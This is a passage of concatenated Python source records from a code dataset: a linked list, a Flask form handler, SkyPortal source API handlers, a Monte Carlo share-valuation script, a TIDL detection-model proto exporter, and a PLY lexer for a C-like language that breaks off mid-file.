delete(self, x):\n # Empty list: Simply return \n if self.isempty():\n return\n\n # If the node we wan't to delete is the first node in the list\n # don't directly delete it:\n if self.value == x:\n # If the list consists of only a single node\n if self.next == None:\n self.value = None\n # If this node is first and the required node but not the only node in list\n # Copy the second node in first and then bypass second\n else:\n self.value = self.next.value\n self.next = self.next.next\n return\n\n # Otherwise walk down the list and delete the required node\n temp = self\n while temp.next != None:\n if temp.next.value == x:\n temp.next = temp.next.next\n return\n else:\n temp = temp.next\n return\n\n\n def delete_recursively(self,v): # delete_recursively\n if self.isempty():\n return\n\n if self.value == v:\n self.value = None\n if self.next != None:\n self.value = self.next.value\n self.next = self.next.next\n return\n else:\n if self.next != None:\n self.next.delete_recursively(v)\n if self.next.value == None:\n self.next = None\n return\n \n def __str__(self):\n selflist = []\n if self.value == None:\n return(str(selflist))\n\n temp = self\n selflist.append(temp.value)\n \n while temp.next != None:\n temp = temp.next\n selflist.append(temp.value)\n\n return(str(selflist))\n","sub_path":"python3_code/my_list_implementation.py","file_name":"my_list_implementation.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"333392033","text":"from flask import Flask, render_template, request, jsonify\nfrom app import app\nimport os\nfrom datetime import datetime\nimport sqlite3\n\nform_data = \"./form_data.db\"\n\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n@app.route('/save_form', methods=['POST'])\ndef save_form(): \n try:\n Name = request.form.get('name')\n Email = 
request.form.get('email')\n Title = request.form.get('title')\n Message = request.form.get('message')\n timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n conn = sqlite3.connect(form_data)\n cur = conn.cursor()\n cur.execute(\"INSERT INTO form_data (Name, Email, Title, Message, Date) VALUES(?, ?, ?, ?, ?)\" ,(Name, Email, Title, Message, timestamp))\n conn.commit()\n return jsonify({\"success\": True})\n except Exception:\n if 'conn' in locals():\n conn.rollback()\n return jsonify({\"success\": False})\n finally:\n # close the connection here: the original conn.close() sat after the\n # returns and was never reached\n if 'conn' in locals():\n conn.close()","sub_path":"1_Projects/7_FlaskNew/Ajax/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"227479568","text":"import tornado.web\nfrom sqlalchemy.orm import joinedload\nfrom sqlalchemy import func\nimport arrow\nfrom functools import reduce\nfrom marshmallow.exceptions import ValidationError\nfrom baselayer.app.access import permissions, auth_or_token\nfrom .base import BaseHandler\nfrom ..models import (DBSession, Comment, Instrument, Photometry, Source,\n Thumbnail, GroupSource, Token, User, Group)\n\n\nSOURCES_PER_PAGE = 100\n\n\nclass SourceHandler(BaseHandler):\n @auth_or_token\n def get(self, source_id=None):\n \"\"\"\n ---\n single:\n description: Retrieve a source\n parameters:\n - in: path\n name: source_id\n required: false\n schema:\n type: integer\n responses:\n 200:\n content:\n application/json:\n schema: SingleSource\n 400:\n content:\n application/json:\n schema: Error\n multiple:\n description: Retrieve all sources\n responses:\n 200:\n content:\n application/json:\n schema: ArrayOfSources\n 400:\n content:\n application/json:\n schema: Error\n \"\"\"\n info = {}\n page_number = self.get_query_argument('page', None)\n if source_id:\n info['sources'] = Source.get_if_owned_by(\n source_id, self.current_user,\n options=[joinedload(Source.comments),\n joinedload(Source.thumbnails)\n .joinedload(Thumbnail.photometry)\n .joinedload(Photometry.instrument)\n .joinedload(Instrument.telescope)])\n elif page_number:\n page = int(page_number)\n q = Source.query.filter(Source.id.in_(DBSession.query(\n GroupSource.source_id).filter(GroupSource.group_id.in_(\n [g.id for g in self.current_user.groups]))))\n info['totalMatches'] = q.count()\n info['sources'] = q.limit(SOURCES_PER_PAGE).offset(\n (page - 1) * SOURCES_PER_PAGE).all()\n info['pageNumber'] = page\n info['sourceNumberingStart'] = (page - 1) * SOURCES_PER_PAGE + 1\n info['sourceNumberingEnd'] = min(info['totalMatches'],\n page * SOURCES_PER_PAGE)\n info['lastPage'] = info['totalMatches'] <= page * SOURCES_PER_PAGE\n if info['totalMatches'] == 0:\n info['sourceNumberingStart'] = 0\n else:\n if isinstance(self.current_user, Token):\n token = self.current_user\n info['sources'] = list(reduce(\n set.union, (set(group.sources) for group in token.groups)))\n else:\n info['sources'] = self.current_user.sources\n\n if info['sources'] is not None:\n return self.success(data=info)\n else:\n return self.error(f\"Could not load source {source_id}\",\n data={\"source_id\": source_id})\n\n @permissions(['Upload data'])\n def post(self):\n \"\"\"\n ---\n description: Upload a source. 
If group_ids is not specified, the user or token's groups will be used.\n parameters:\n - in: path\n name: source\n schema: Source\n responses:\n 200:\n content:\n application/json:\n schema:\n allOf:\n - Success\n - type: object\n properties:\n id:\n type: string\n description: New source ID\n \"\"\"\n data = self.get_json()\n schema = Source.__schema__()\n user_group_ids = [g.id for g in self.current_user.groups]\n if not user_group_ids:\n return self.error(\"You must belong to one or more groups before \"\n \"you can add sources.\")\n try:\n group_ids = [id for id in data.pop('group_ids') if id in user_group_ids]\n except KeyError:\n group_ids = user_group_ids\n if not group_ids:\n return self.error(\"Invalid group_ids field. Please specify at least \"\n \"one valid group ID that you belong to.\")\n try:\n s = schema.load(data)\n except ValidationError as e:\n return self.error('Invalid/missing parameters: '\n f'{e.normalized_messages()}')\n groups = Group.query.filter(Group.id.in_(group_ids)).all()\n if not groups:\n return self.error(\"Invalid group_ids field. Please specify at least \"\n \"one valid group ID that you belong to.\")\n s.groups = groups\n DBSession.add(s)\n DBSession().commit()\n\n self.push_all(action='skyportal/FETCH_SOURCES')\n return self.success(data={\"id\": s.id})\n\n @permissions(['Manage sources'])\n def put(self, source_id):\n \"\"\"\n ---\n description: Update a source\n parameters:\n - in: path\n name: source\n schema: Source\n responses:\n 200:\n content:\n application/json:\n schema: Success\n 400:\n content:\n application/json:\n schema: Error\n \"\"\"\n s = Source.get_if_owned_by(source_id, self.current_user)\n data = self.get_json()\n data['id'] = source_id\n\n schema = Source.__schema__()\n try:\n schema.load(data)\n except ValidationError as e:\n return self.error('Invalid/missing parameters: '\n f'{e.normalized_messages()}')\n DBSession().commit()\n\n return self.success(action='skyportal/FETCH_SOURCES')\n\n @permissions(['Manage sources'])\n def delete(self, source_id):\n \"\"\"\n ---\n description: Delete a source\n parameters:\n - in: path\n name: source\n schema:\n Source\n responses:\n 200:\n content:\n application/json:\n schema: Success\n \"\"\"\n s = Source.get_if_owned_by(source_id, self.current_user)\n DBSession.query(Source).filter(Source.id == source_id).delete()\n DBSession().commit()\n\n return self.success(action='skyportal/FETCH_SOURCES')\n\n\nclass FilterSourcesHandler(BaseHandler):\n @auth_or_token\n def post(self):\n data = self.get_json()\n info = {}\n if 'pageNumber' in data:\n page = int(data['pageNumber'])\n already_counted = True\n else:\n page = 1\n already_counted = False\n info['pageNumber'] = page\n q = Source.query.filter(Source.id.in_(DBSession.query(\n GroupSource.source_id).filter(GroupSource.group_id.in_(\n [g.id for g in self.current_user.groups]))))\n\n if data['sourceID']:\n q = q.filter(Source.id.contains(data['sourceID'].strip()))\n if data['ra'] and data['dec'] and data['radius']:\n ra = float(data['ra'])\n dec = float(data['dec'])\n radius = float(data['radius'])\n q = q.filter(Source.ra <= ra + radius)\\\n .filter(Source.ra >= ra - radius)\\\n .filter(Source.dec <= dec + radius)\\\n .filter(Source.dec >= dec - radius)\n if data['startDate']:\n start_date = arrow.get(data['startDate'].strip())\n q = q.filter(Source.last_detected >= start_date)\n if data['endDate']:\n end_date = arrow.get(data['endDate'].strip())\n q = q.filter(Source.last_detected <= end_date)\n if data['simbadClass']:\n q = 
q.filter(func.lower(Source.simbad_class) ==\n data['simbadClass'].lower())\n if data['hasTNSname']:\n q = q.filter(Source.tns_name.isnot(None))\n\n if already_counted:\n info['totalMatches'] = int(data['totalMatches'])\n else:\n info['totalMatches'] = q.count()\n info['sources'] = q.limit(SOURCES_PER_PAGE).offset(\n (page - 1) * SOURCES_PER_PAGE).all()\n\n info['lastPage'] = info['totalMatches'] <= page * SOURCES_PER_PAGE\n info['sourceNumberingStart'] = (page - 1) * SOURCES_PER_PAGE + 1\n info['sourceNumberingEnd'] = min(info['totalMatches'],\n page * SOURCES_PER_PAGE)\n if info['totalMatches'] == 0:\n info['sourceNumberingStart'] = 0\n\n return self.success(data=info)\n\n\nclass SourcePhotometryHandler(BaseHandler):\n @auth_or_token\n def get(self, source_id):\n \"\"\"\n ---\n description: Retrieve a source's photometry\n parameters:\n - in: path\n name: source_id\n required: true\n schema:\n type: string\n responses:\n 200:\n content:\n application/json:\n schema: ArrayOfPhotometrys\n 400:\n content:\n application/json:\n schema: Error\n \"\"\"\n source = Source.query.get(source_id)\n if not source:\n return self.error('Invalid source ID.')\n if not set(source.groups).intersection(set(self.current_user.groups)):\n return self.error('Inadequate permissions.')\n return self.success(data={'photometry': source.photometry})\n","sub_path":"skyportal/handlers/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":9726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"357504800","text":"\nimport datetime as dt\n#import math as m\nimport numpy as np\nimport random as r\nimport matplotlib.pyplot as plt\nimport fcff\n\ndef years(days):\n return days / 365\n\nformat = '%d-%m-%y'\nnow = dt.datetime.now()\nttm = dt.datetime.strptime('31-12-18', format) - dt.datetime.now()\nT = years(ttm.days)\n\nshares = 762.409 # millions of shares\nsales = 7017 # last\nnwc = -1856 # last\ndebt = 8365 # last\ncash = 4853 #last\ngrowth_base = np.array([9.57, 5.31, 0.64, 1.87, 2.77, 3.44, 3.95, 4.35, 4.67, 4.93]) / 100\ngrowth_owl = np.array([11.27, 35.50, 42.02, 20.53, 19.70, 18.27, 16.61, 14.94, 13.36, 11.93]) / 100\nterminal_g = 0.03\ngross_margin = 0.2502\ntax = 0.34\nd_a = 0.1225\ncapex = 0.0214\ntarget_nwc = 0.05\nwacc = 0.0926\n\n# simulations\nequity = []\nfor j in range(1,50000):\n\n if r.random() < 0.1: # OWL success\n growth = growth_owl\n else:\n growth = growth_base\n\n g = np.exp( np.random.normal(growth + 0.5 * 0.0455**2.0, 0.0455, 10) ) - 1\n margin = np.random.normal(gross_margin, 0.0446, 1)\n k = np.random.normal(wacc, wacc*0.05, 1)\n\n dummy = fcff.enterprise_value(sales, g, terminal_g, margin, tax, d_a, capex, nwc, target_nwc, k, T) - debt + cash\n equity.append(dummy[0])\n\nequity.sort()\nshare = np.array(equity) / shares\nmean = np.mean(share)\nmedian = np.percentile(share, 50)\nlower = np.percentile(share, 5)\nupper = np.percentile(share, 95)\n#print(equity)\nprint(f\"\\nmean is {mean:.2f}\")\nprint(f\"median is {median:.2f}\")\nprint(f\" 5% quantile is {lower:.2f}\")\nprint(f\"95% quantile is {upper:.2f}\\n\")\n\n#%matplotlib inline\nplt.hist(share, density=1, bins=100)\nplt.xlim([0,250])\n#plt.xlabel('Equity value')\n#plt.ylabel('Probability')\nplt.title('Price per share')\n#plt.grid(True)\nplt.show()\n","sub_path":"simulations.py","file_name":"simulations.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 
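The simulations.py record above prices a share by Monte Carlo: it draws lognormal growth scenarios (with a small chance of switching to the higher "OWL" growth path), revalues the firm under each draw via fcff.enterprise_value, and reads the result off percentiles of the simulated distribution. A minimal self-contained sketch of the same pattern, with the fcff cash-flow model replaced by a hypothetical stub and all constants illustrative:

import numpy as np

def enterprise_value_stub(growth_path, discount_rate):
    # hypothetical stand-in for fcff.enterprise_value: project a cash flow
    # along the sampled growth path and discount it back to today
    cash_flows = 100.0 * np.cumprod(1.0 + growth_path)
    years = np.arange(1, len(growth_path) + 1)
    return float(np.sum(cash_flows / (1.0 + discount_rate) ** years))

rng = np.random.default_rng(0)
values = []
for _ in range(10000):
    g = np.exp(rng.normal(0.04, 0.0455, 10)) - 1.0  # lognormal growth draws
    k = rng.normal(0.0926, 0.0926 * 0.05)           # noisy discount rate
    values.append(enterprise_value_stub(g, k))

values = np.array(values)
print(f"median {np.percentile(values, 50):.1f}, "
      f"5-95% band [{np.percentile(values, 5):.1f}, {np.percentile(values, 95):.1f}]")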
+{"seq_id":"374917975","text":"\n\nfrom xai.brain.wordbase.adjectives._provincial import _PROVINCIAL\n\n#class header\nclass _PROVINCIALS(_PROVINCIAL, ):\n\tdef __init__(self,): \n\t\t_PROVINCIAL.__init__(self)\n\t\tself.name = \"PROVINCIALS\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"provincial\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_provincials.py","file_name":"_provincials.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"600076766","text":"# Copyright (c) 2018-2021, Texas Instruments\n# All Rights Reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport os\nimport numpy as np\nimport torch\nfrom .quantize import is_mmdet_quant_module\nfrom .proto import tidl_meta_arch_mmdet_pb2\nfrom google.protobuf import text_format\n\n__all__ = ['save_model_proto']\n\n\ndef save_model_proto(cfg, model, input, output_filename, input_names=None, feature_names=None, output_names=None):\n output_filename = os.path.splitext(output_filename)[0] + '.prototxt'\n input = input[0] if isinstance(input, (list,tuple)) and \\\n isinstance(input[0], (torch.Tensor, np.ndarray)) else input\n input_size = input.size() if isinstance(input, torch.Tensor) else input\n model = model.module if is_mmdet_quant_module(model) else model\n is_ssd = hasattr(cfg.model, 'bbox_head') and ('SSD' in cfg.model.bbox_head.type)\n is_fcos = hasattr(cfg.model, 'bbox_head') and ('FCOS' in cfg.model.bbox_head.type)\n is_retinanet = hasattr(cfg.model, 'bbox_head') and ('Retina' in cfg.model.bbox_head.type)\n is_yolov3 = hasattr(cfg.model, 'bbox_head') and ('YOLOV3' in cfg.model.bbox_head.type)\n is_yolox = hasattr(cfg.model, 'bbox_head') and ('YOLOXHead' in cfg.model.bbox_head.type)\n input_names = input_names or ('input',)\n\n if is_ssd:\n _save_mmdet_proto_ssd(cfg, model, input_size, output_filename, input_names, feature_names, output_names)\n elif is_retinanet:\n _save_mmdet_proto_retinanet(cfg, model, input_size, output_filename, input_names, feature_names, 
output_names)\n elif is_yolov3:\n _save_mmdet_proto_yolov3(cfg, model, input_size, output_filename, input_names, feature_names, output_names)\n elif is_yolox:\n _save_mmdet_proto_yolox(cfg, model, input_size, output_filename, input_names, feature_names, output_names)\n #\n\n\n###########################################################\ndef _create_rand_inputs(input_size, is_cuda=False):\n x = torch.rand(input_size)\n x = x.cuda() if is_cuda else x\n return x\n\n\ndef _save_mmdet_onnx(cfg, model, input_list, output_filename, input_names=None, proto_names=None, output_names=None,\n opset_version=11):\n #https://github.com/open-mmlab/mmdetection/pull/1082\n assert hasattr(model, 'forward_dummy'), 'writing onnx is not supported by this model'\n model.eval()\n os.makedirs(os.path.dirname(output_filename), exist_ok=True)\n forward_backup = model.forward #backup forward\n model.forward = model.forward_dummy #set dummy forward\n torch.onnx.export(\n model,\n input_list,\n output_filename,\n input_names=input_names,\n output_names=proto_names,\n export_params=True,\n keep_initializers_as_inputs=True,\n do_constant_folding=True,\n verbose=False,\n opset_version=opset_version)\n model.forward = forward_backup #restore forward\n\n\n###########################################################\ndef _save_mmdet_proto_ssd(cfg, model, input_size, output_filename, input_names=None, proto_names=None, output_names=None):\n num_proto_names = len(proto_names)//2\n cls_proto_names = proto_names[:num_proto_names]\n reg_proto_names = proto_names[num_proto_names:]\n bbox_head = model.bbox_head\n anchor_generator = bbox_head.anchor_generator\n\n prior_box_param = []\n for h_idx in range(num_proto_names):\n min_size=[anchor_generator.min_sizes[h_idx]]\n max_size=[anchor_generator.max_sizes[h_idx]]\n aspect_ratio=anchor_generator.ratios[h_idx][2::2]\n step=anchor_generator.strides[h_idx]\n step=step[0] if isinstance(step,(tuple,list)) else step\n prior_box_param.append(tidl_meta_arch_mmdet_pb2.PriorBoxParameter(min_size=min_size, max_size=max_size,\n aspect_ratio=aspect_ratio, step=step,\n variance=bbox_head.bbox_coder.stds, clip=False, flip=True))\n #\n\n nms_param = tidl_meta_arch_mmdet_pb2.TIDLNmsParam(nms_threshold=0.45, top_k=200)\n detection_output_param = tidl_meta_arch_mmdet_pb2.TIDLOdPostProc(num_classes=bbox_head.num_classes+1, share_location=True,\n background_label_id=bbox_head.num_classes, nms_param=nms_param,\n code_type=tidl_meta_arch_mmdet_pb2.CENTER_SIZE, keep_top_k=200,\n confidence_threshold=0.3)\n\n ssd = tidl_meta_arch_mmdet_pb2.TidlMaCaffeSsd(box_input=reg_proto_names, class_input=cls_proto_names,\n output=output_names, prior_box_param=prior_box_param,\n in_width=input_size[3], in_height=input_size[2],\n detection_output_param=detection_output_param,\n framework='MMDetection')\n\n arch = tidl_meta_arch_mmdet_pb2.TIDLMetaArch(name='ssd', caffe_ssd=[ssd])\n\n with open(output_filename, 'wt') as pfile:\n txt_message = text_format.MessageToString(arch)\n pfile.write(txt_message)\n\n\n###########################################################\ndef _save_mmdet_proto_retinanet(cfg, model, input_size, output_filename, input_names=None, proto_names=None, output_names=None):\n num_proto_names = len(proto_names)//2\n cls_proto_names = proto_names[:num_proto_names]\n reg_proto_names = proto_names[num_proto_names:]\n bbox_head = model.bbox_head\n anchor_generator = bbox_head.anchor_generator\n\n background_label_id = -1 if bbox_head.use_sigmoid_cls else bbox_head.num_classes\n num_classes = 
bbox_head.num_classes if bbox_head.use_sigmoid_cls else bbox_head.num_classes+1\n score_converter = tidl_meta_arch_mmdet_pb2.SIGMOID if bbox_head.use_sigmoid_cls else tidl_meta_arch_mmdet_pb2.SOFTMAX\n anchor_param = tidl_meta_arch_mmdet_pb2.RetinaNetAnchorParameter(aspect_ratio=anchor_generator.ratios,\n octave_base_scale=anchor_generator.octave_base_scale,\n scales_per_octave=anchor_generator.scales_per_octave)\n\n nms_param = tidl_meta_arch_mmdet_pb2.TIDLNmsParam(nms_threshold=0.45, top_k=200)\n detection_output_param = tidl_meta_arch_mmdet_pb2.TIDLOdPostProc(num_classes=num_classes, share_location=True,\n background_label_id=background_label_id, nms_param=nms_param,\n code_type=tidl_meta_arch_mmdet_pb2.CENTER_SIZE, keep_top_k=200,\n confidence_threshold=0.3)\n\n retinanet = tidl_meta_arch_mmdet_pb2.TidlMaRetinaNet(box_input=reg_proto_names, class_input=cls_proto_names,\n output=output_names, x_scale=1.0, y_scale=1.0, width_scale=1.0, height_scale=1.0,\n in_width=input_size[3], in_height=input_size[2],\n score_converter=score_converter, anchor_param=anchor_param,\n detection_output_param=detection_output_param,\n framework='MMDetection')\n\n arch = tidl_meta_arch_mmdet_pb2.TIDLMetaArch(name='retinanet', tidl_retinanet=[retinanet])\n\n with open(output_filename, 'wt') as pfile:\n txt_message = text_format.MessageToString(arch)\n pfile.write(txt_message)\n\n\n###########################################################\ndef _save_mmdet_proto_yolov3(cfg, model, input_size, output_filename, input_names=None, proto_names=None, output_names=None):\n bbox_head = model.bbox_head\n anchor_generator = bbox_head.anchor_generator\n base_sizes = anchor_generator.base_sizes\n\n background_label_id = -1\n num_classes = bbox_head.num_classes\n #score_converter = tidl_meta_arch_mmdet_pb2.SIGMOID\n\n yolo_params = []\n for base_size_id, base_size in enumerate(base_sizes):\n yolo_param = tidl_meta_arch_mmdet_pb2.TIDLYoloParams(input=proto_names[base_size_id],\n anchor_width=[b[0] for b in base_size],\n anchor_height=[b[1] for b in base_size])\n yolo_params.append(yolo_param)\n\n nms_param = tidl_meta_arch_mmdet_pb2.TIDLNmsParam(nms_threshold=0.45, top_k=200)\n detection_output_param = tidl_meta_arch_mmdet_pb2.TIDLOdPostProc(num_classes=num_classes, share_location=True,\n background_label_id=background_label_id, nms_param=nms_param,\n code_type=tidl_meta_arch_mmdet_pb2.CENTER_SIZE_EXP, keep_top_k=200,\n confidence_threshold=0.3)\n\n yolov3 = tidl_meta_arch_mmdet_pb2.TidlYoloOd(name='yolo_v3', output=output_names,\n in_width=input_size[3], in_height=input_size[2],\n yolo_param=yolo_params,\n detection_output_param=detection_output_param,\n framework='MMDetection')\n\n arch = tidl_meta_arch_mmdet_pb2.TIDLMetaArch(name='yolo_v3', tidl_yolo=[yolov3])\n\n with open(output_filename, 'wt') as pfile:\n txt_message = text_format.MessageToString(arch)\n pfile.write(txt_message)\n\n\n###########################################################\ndef _save_mmdet_proto_yolox(cfg, model, input_size, output_filename, input_names=None, proto_names=None, output_names=None):\n bbox_head = model.bbox_head\n # anchor_generator = bbox_head.anchor_generator\n base_sizes = model.bbox_head.strides\n\n background_label_id = -1\n num_classes = bbox_head.num_classes\n #score_converter = tidl_meta_arch_mmdet_pb2.SIGMOID\n\n yolo_params = []\n for base_size_id, base_size in enumerate(base_sizes):\n yolo_param = tidl_meta_arch_mmdet_pb2.TIDLYoloParams(input=proto_names[base_size_id],\n anchor_width=[base_size],\n 
anchor_height=[base_size])\n yolo_params.append(yolo_param)\n\n nms_param = tidl_meta_arch_mmdet_pb2.TIDLNmsParam(nms_threshold=0.45, top_k=200)\n detection_output_param = tidl_meta_arch_mmdet_pb2.TIDLOdPostProc(num_classes=num_classes, share_location=True,\n background_label_id=background_label_id, nms_param=nms_param,\n code_type=tidl_meta_arch_mmdet_pb2.CODE_TYPE_YOLO_X, keep_top_k=200,\n confidence_threshold=0.3)\n\n yolox = tidl_meta_arch_mmdet_pb2.TidlYoloOd(name='yolox', output=output_names,\n in_width=input_size[3], in_height=input_size[2],\n yolo_param=yolo_params,\n detection_output_param=detection_output_param,\n framework='MMDetection')\n\n arch = tidl_meta_arch_mmdet_pb2.TIDLMetaArch(name='yolox', tidl_yolo=[yolox])\n\n with open(output_filename, 'wt') as pfile:\n txt_message = text_format.MessageToString(arch)\n pfile.write(txt_message)","sub_path":"mmdet/utils/save_model.py","file_name":"save_model.py","file_ext":"py","file_size_in_byte":12917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"549941156","text":"from ply import lex\nimport re\nimport sys\nlineno = 0\n#Personal Groups\n\nkeywords = {\n 'auto':'AUTO',\n 'break':'BREAK',\n 'case':'CASE',\n # 'catch':'CATCH',\n 'char':'CHAR',\n 'class':'CLASS',\n 'continue':'CONTINUE',\n 'default':'DEFAULT',\n 'delete':'DELETE',\n 'do':'DO',\n 'else':'ELSE',\n 'float':'FLOAT',\n 'for':'FOR',\n 'if':'IF',\n 'int':'INT',\n 'new':'NEW',\n 'print_int' : 'PRINTINT',\n 'print_char' : 'PRINTCHAR',\n 'print_float' : 'PRINTFLOAT',\n 'return':'RETURN',\n 'scan_int' : 'SCANINT',\n 'scan_char' : 'SCANCHAR',\n 'sizeof':'SIZEOF',\n 'switch':'SWITCH',\n 'struct' : 'STRUCT',\n 'this':'THIS',\n # 'throw':'THROW',\n # 'try':'TRY',\n # 'typedef':'TYPEDEF',\n # 'type' : 'TYPE',\n # 'template' : 'TEMPLATE',\n 'while':'WHILE',\n}\n\n# List of token names. 
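# (grouped below: identifiers and literals, arithmetic operators, comparison operators, parentheses, and other punctuation, plus the keyword names)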
\ntokens = [\n # id and no\n 'IDENTIFIER',\n 'NUMBER',\n 'DECIMAL',\n\n # arithmetic operator\n 'PLUSOP',\n 'MINUSOP',\n 'DIVOP',\n 'MULTOP',\n 'OROP',\n 'BANDOP',\n 'ANDOP',\n 'MODOP',\n 'PLUSEQOP',\n 'MINUSEQOP',\n 'MULTEQOP',\n 'DIVEQOP',\n 'XOROP',\n 'BNOP',\n 'BOROP',\n\n #comparison operator, =\n 'EQCOMP',\n 'NEQCOMP',\n 'GTCOMP',\n 'GTECOMP',\n 'LTCOMP',\n 'LTECOMP',\n 'EQUAL',\n\n # Parenthesis\n 'LPAREN',\n 'RPAREN',\n 'LCPAREN',\n 'RCPAREN',\n 'LSPAREN',\n 'RSPAREN',\n\n # OTHER\n 'COMMA',\n 'DOT',\n 'SEMICOLON',\n 'COLON',\n 'DOUBLECOLON',\n 'SCHAR',\n 'STRING_L',\n 'NOTSYM',\n 'QUESMARK',\n 'ARROW',\n 'MODEQOP',\n 'DPLUSOP',\n 'LSHIFT',\n 'RSHIFT',\n 'DMINUSOP',\n 'LTEMPLATE',\n 'RTEMPLATE', \n] + list(keywords.values())\n\n# Regular expression rules for simple tokens\n\n# RegEx id\ndef t_IDENTIFIER(t):\n r'[a-zA-Z_][a-zA-Z0-9_]*'\n t.type = keywords.get(t.value, 'IDENTIFIER')\n return t\n\ndef t_DECIMAL(t):\n #r'((\\d+\\.\\d+[eE]([+-])?\\d+)|(\\d+[eE]([+-])?\\d+)|(\\d+\\.\\d+)|(\\.\\d+)|(\\d+))'\n r'(\\d+\\.\\d+)([eE][-+]?\\d+)?'\n t.value=float(t.value)\n return t\n\ndef t_NUMBER(t):\n #r'((\\d+\\.\\d+[eE]([+-])?\\d+)|(\\d+[eE]([+-])?\\d+)|(\\d+\\.\\d+)|(\\.\\d+)|(\\d+))'\n r'\\d+([eE][-+]?\\d+)?'\n t.value=int(t.value)\n return t\n\n# Arithmetic Operator\nt_PLUSOP = r'\\+'\nt_MINUSOP = r'-'\nt_DIVOP = r'/'\nt_MULTOP = r'\\*'\nt_MODOP = r'\\%'\nt_XOROP = r'\\^'\n\nt_OROP = r'\\|\\|'\nt_BANDOP = r'\\&'\nt_BOROP = r'\\|'\nt_ANDOP = r'\\&\\&'\n\nt_PLUSEQOP = r'\\+='\nt_MODEQOP = r'\\%\\='\nt_MINUSEQOP = r'-='\nt_MULTEQOP = r'\\*='\nt_DIVEQOP = r'/='\n\nt_DPLUSOP = r'\\+\\+'\nt_DMINUSOP = r'--'\nt_BNOP = r'\\~'\nt_LSHIFT = r'\\<\\<'\nt_RSHIFT = r'\\>\\>'\n\n\nt_LTEMPLATE = r'<\\|'\nt_RTEMPLATE = r'\\|>'\n\n\n# Comparison Operator\nt_EQCOMP = r'=='\nt_NEQCOMP = r'!='\nt_GTCOMP = r'>'\nt_GTECOMP = r'>='\nt_LTCOMP = r'<'\nt_LTECOMP = r'<='\nt_EQUAL = r'='\n\n# Parenthesis\nt_LPAREN = r'\\('\nt_RPAREN = r'\\)'\nt_LCPAREN = r'\\{'\nt_RCPAREN = r'\\}'\nt_LSPAREN = r'\\['\nt_RSPAREN = r'\\]'\n\n# Other\nt_COMMA = r','\nt_DOT = r'\\.'\nt_SEMICOLON = r';'\nt_COLON = r':'\nt_DOUBLECOLON = r'::'\nt_SCHAR = r'\\'.\\''\nt_STRING_L = r'\\\".*\\\"'\nt_NOTSYM = r'\\!'\nt_QUESMARK = r'\\?'\nt_ARROW = r'-\\>'\n\n\n# track line no.\ndef t_newline(t):\n r'\\n+'\n t.lexer.lineno += len(t.value)\n global lineno\n lineno = lineno + 1\n\n# comment\ndef t_COMMENT(t):\n r'( (//)[^\\n\\r]* ) |(/\\*([^*]|[\\r\\n]|(\\*+([^*/]|[\\r\\n])))*\\*+/)'\n t.value = str(t.value)\n t.type = 'COMMENT'\n pass\n\n\n# A string containing ignored characters (spaces and tabs)\nt_ignore = ' \\t'\n\n# Error handling rule\ndef t_error(t):\n tk = re.split('[ \\t]', t.value)[0]\n print(\"Illegal token '%s'\" % tk)\n exit(-1)\n t.lexer.skip(len(tk))\n\n# Build the lexer\nlexer = lex.lex(debug = 0)\n\n\n\ndef find_column(input, token):\n line_start = input.rfind('\\n', 0, token.lexpos) + 1\n return (token.lexpos - line_start) + 1\n \nif __name__ == \"__main__\":\n \n\n for arg in sys.argv[1:]:\n if arg.split('=')[0] == \"--cfg\" :\n cfg_file=arg.split('=')[1]\n elif arg.split('=')[0] == \"--output\" :\n output_file=arg.split('=')[1]\n else:\n input_file=arg\n\n color_dict={}\n with open(cfg_file, \"r\") as f:\n for line in f:\n if line:\n (key,val) = line.split(':')\n color_dict[str(key).strip()] = str(val).strip()\n\n \n\n lines=[]\n with open(input_file, \"r\") as f:\n for line in f:\n lines.append(line)\n code = ''.join(lines)\n #print(code)\n lexer.input(code)\n\n meta_bgcolor = color_dict.get(\"META_BGCOLOR\", \"#121e1f\")\n 
